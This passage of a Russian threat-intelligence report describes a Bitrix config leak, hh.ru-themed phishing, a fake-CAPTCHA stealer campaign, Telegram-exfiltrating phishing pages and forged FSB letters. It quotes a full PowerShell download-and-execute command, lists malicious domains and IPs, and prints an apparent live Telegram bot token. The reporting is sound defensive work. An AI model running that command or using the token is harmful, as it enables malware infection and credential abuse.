Анализ данных указывает на то, что за этой атакой могут стоять украинские хактивисты, действующие под именем hdr0, которые ранее уже осуществляли подобные действия, публикуя базы данных российских компаний в период с 2023 по 2024 год. Дополнительные сведения, полученные из кэша Google, свидетельствуют о том, что в прошлом файл settings.php, предположительно, мог загружаться с адреса, связанного с администрированием системы, что подтверждается обнаружением URL вида https://<redacted>/bitrix/admin/iblock_element_edit.php. При этом, учитывая предыдущий опыт анализа атак на системы, работающие на Bitrix, можно предположить, что файл конфигурации также мог быть доступен по другим адресам, таким как https://<redacted>/bitrix/admin/settings.php или https://ip-sol.ru/index.php.

На текущий момент наблюдается, что администраторские страницы, доступные по адресам https://<redacted>/bitrix/admin/ и https://<redacted>/.ru/pma, корректно отображают форму входа, что говорит о том, что меры по восстановлению и защите системы уже приняты. Однако тот факт, что файл error.log до сих пор доступен, может свидетельствовать о наличии ошибок в конфигурации прав доступа, что заслуживает дополнительного внимания специалистов.

Дополнительные упоминания этого инцидента в хакерских чатах отсутствуют, что может свидетельствовать о том, что кибератака не получила широкого резонанса в информационном пространстве.

Таким образом, совокупность полученных данных позволяет сделать вывод о том, что злоумышленники, вероятно, пытались использовать уязвимости в системе, однако своевременное обнаружение и устранение проблемы позволили ограничить последствия инцидента.

Фишинговый HeadHunter

Рис. 30. Фишинговая рассылка письма со ссылкой на поддельный сайт
Рис. 30. Фишинговая рассылка письма со ссылкой на поддельный сайт

В начале марта группа киберразведки выявила серию фишинговых писем, предположительно нацеленных на HR-отделы российских компаний. Эти письма, маскирующиеся под официальные уведомления от hh.ru, популярной российской платформы для поиска работы, содержат угрозы блокировки аккаунта и побуждают получателей к немедленным действиям.

Особенность атаки заключается в использовании двух ссылок: первая ведет на легитимный сайт hh.ru для смены пароля, что создает иллюзию достоверности, а вторая, якобы для подтверждения, направляет пользователей на фишинговый ресурс www.hhsecurites.site. Этот сайт, размещенный на украинском IP-адресе (185.104.45.101), предназначен для кражи учетных данных.

Успешная атака может привести к утечке конфиденциальной информации сотрудников, которую обычно обрабатывают HR-специалисты, а также к дальнейшему использованию скомпрометированных аккаунтов для новых атак.

Рис. 31. Поддельный сайт с мимикрией под hh.ru
Рис. 31. Поддельный сайт с мимикрией под hh.ru

Примечательно, что описание на фишинговом домене содержит орфографические ошибки (например, «Зарегестрироваться»), а в верстке сайта присутствуют комментарии на украинском языке.

Рис. 32. Код верстки сайта с украинскими комментариями
Рис. 32. Код верстки сайта с украинскими комментариями

Индикаторы компрометации:

Доменыhhsecurites[.]site
headhuntersupp[.]online
hhsupp[.]site
supporthh[.]site
hhsecurity[.]site
hhpodderzka[.]site
hhsecuritys[.]site
hhsupport[.]icu
IP-адреса185.104.45[.]101
167.235.12[.]146
167.235.12[.]146
157.90.95[.]176
167.235.12[.]146
167.235.12[.]146
185.68.16[.]111
46.17.175.67

Кража данных через капчу

Рис. 33. Архивная запись взломанного сайта
Рис. 33. Архивная запись взломанного сайта

Внутренние системы группы киберразведки обнаружили взлом сайта для радиолюбителей. При входе на сайт пользователю сразу же предлагается пройти проверку и доказать, что он не робот.

При нажатии на кнопку «Я не робот» запускается JavaScript-функция. Она копирует заранее подготовленный текст в буфер обмена.

Рис. 34. Вредоносная капча при входе на сайт
Рис. 34. Вредоносная капча при входе на сайт

Пользователю предлагается следовать инструкциям: открыть окно «Выполнить» (Win+R) и нажать Ctrl+V, чтобы вставить скопированный текст. При этом в буфер попадает следующая команда:

PowerShell.exe -WindowStyle Hidden -nop -exec bypass -c "iex (New-Object Net.WebClient).DownloadString('http://45.61.157.179/script.ps1') # 'I am not a robot - reCAPTCHA ID: 477237535673 TRUE'"


Из-за ограниченного размера окна «Выполнить» отображается лишь последняя ее часть.

Рис. 35. Часть команды, которая видна в Run
Рис. 35. Часть команды, которая видна в Run

Команда запускает PowerShell в скрытом режиме, отключая проверки безопасности, скачивает удаленный PS1-скрипт с указанного URL и сразу его выполняет.

Скрипт представляет собой стилер. Вредоносный инструмент загружается в систему и выполняется для дальнейшего извлечения данных, файлов, а также для создания скриншотов экрана.

После сбора информации формируется команда curl, которая посредством POST-запроса HTTP отправляет данные на сервер злоумышленников.

Индикаторы компрометации:

Доменыeschool-ua[.]online
IP-адреса45.61.157[.]179
Имена файловscript.ps1
Контрольная сумма (MD5)aaef9799a198169f8b88198cfb8c50ba

Атака на российский банк

Рис. 36. Фишинговое письмо
Рис. 36. Фишинговое письмо

Группа киберразведки в феврале обнаружила фишинговое почтовое сообщение от неизвестного актора, адресованное одному из российских банков. Письмо содержало вложение в виде HTML-страницы с JavaScript-скриптом, который имитировал страницу входа в почтовый клиент. Для повышения правдоподобности в поле логина автоматически прописывался почтовый адрес жертвы, что могло ввести пользователя в заблуждение и побудить его ввести свои учетные данные.

Рис. 37. Поддельная форма авторизации со встроенным кейлоггером
Рис. 37. Поддельная форма авторизации со встроенным кейлоггером

Скрипт, встроенный в HTML-страницу, был разработан для перехвата логина и пароля пользователя. После ввода данных они передавались в телеграм-бот, который взаимодействовал с пользователем под ID 6226887618.

Письмо было отправлено с IP-адреса 199.217.106.242 (242.106.colo.xcelx.net). Этот IP-адрес уже ассоциировался с другими вредоносными EML-файлами, помеченными как Agent Tesla, которые были адресованы англо- и испаноговорящим жителям европейских стран.

В ходе анализа переписки телеграм-бота со злоумышленником утечек комбинаций «логин — пароль» обнаружено не было. Для предотвращения возможных угроз телеграм-бот был поставлен на мониторинг системами киберразведки TI-департамента, что позволит отслеживать его активность и своевременно реагировать на потенциальные риски.

Индикаторы компрометации:

Телеграм-бот
6805715304:AAFMbi41m8JFDKCLW4A0cFmDWIE0lYcc1KI

Социальная инженерия

В течение января и февраля группой киберразведки Positive Technologies фиксировались фишинговые документы якобы от имени ФСБ России в адрес коммерческих и государственных компаний. Целью мошенников было получение персональных данных сотрудников, которые могут быть использованы в дальнейших атаках на компании.

Фишинг от имени УФСБ России по г. Москве и Московской области

Фишинговый PDF-документ представляет собой запрос, подписанный начальником А. Н. Дорофеевым и адресованный государственному научно-исследовательскому предприятию.

Общая информация о документе:

Дата создания: 28.12.2024
MD5: 46771733f14e7a4a5f8182a4ed0cb592
Автор: react-pdf

Рис. 38. Документ-приманка
Рис. 38. Документ-приманка

Основные признаки поддельного документа:

  • Использование несуществующего закона «ч. 4 ст.30.1 от 21 июля 1993 г. № 5885-1». Вероятно, злоумышленники хотели сослаться на закон «О государственной тайне» от 21 июля 1993 г. № 5485-1, но опечатались.
ч. 4 ст.30.1 от 21 июля 1993 г. № 5885-1
  • Указание некорректных должностей.
Указание некорректных должностей
  • Использование поддельной подписи, а именно ее заимствование с домена td-elastik[.]ru.
Использование поддельной подписи

Еще один фишинг от имени УФСБ России по г. Москве и Московской области

Фишинговый PDF-документ представляет собой запрос, якобы подписанный первым заместителем директора ФСБ России С. Б. Королевым и адресованный российскому системному интегратору.

Общая информация о документе:

Дата создания: 04.02.2025
MD5: f11bbe86ead2d0fa1e7dba7cefdd934d
Автор: мвд

Рис. 39. Документ-приманка
Рис. 39. Документ-приманка

Основные признаки поддельного документа:

  • Указание некорректной должности: «генерал» вместо «Генерал армии», а также выравнивание ФИО подписанта по левому краю, а не по правому.
Указание некорректной должности
  • Использование поддельной подписи, а именно ее заимствование с домена bogatyr[.]club/54928-rospis-ruchkoj.html.
Использование поддельной подписи

Плохой безопасник хуже хакера

Рис. 40. Письмо с комбинациями логинов и паролей, отправленное в публичную песочницу
Рис. 40. Письмо с комбинациями логинов и паролей, отправленное в публичную песочницу

Сотрудники группы киберразведки регулярно фиксируют с помощью внутренних систем TI-департамента случаи отправки легитимных писем в публичные песочницы. Подобные инциденты указывают на недостаточную осведомлённость о рисках, связанных с раскрытием конфиденциальной информации, содержащейся в корпоративной переписке.

Рис. 41. Содержимое облака
Рис. 41. Содержимое облака

Отправка писем из внешнего контура в публичные песочницы, практикуемая рядом компаний, может привести к утечке чувствительных данных — учетных записей, паролей и ссылок на внутренние ресурсы. При попадании таких данных в руки злоумышленников возможен несанкционированный доступ к корпоративным системам. Для минимизации рисков, рекомендуется направлять в песочницу только подозрительные вложения, исключив метаданные и другие элементы, способные раскрыть внутреннюю инфраструктуру компании.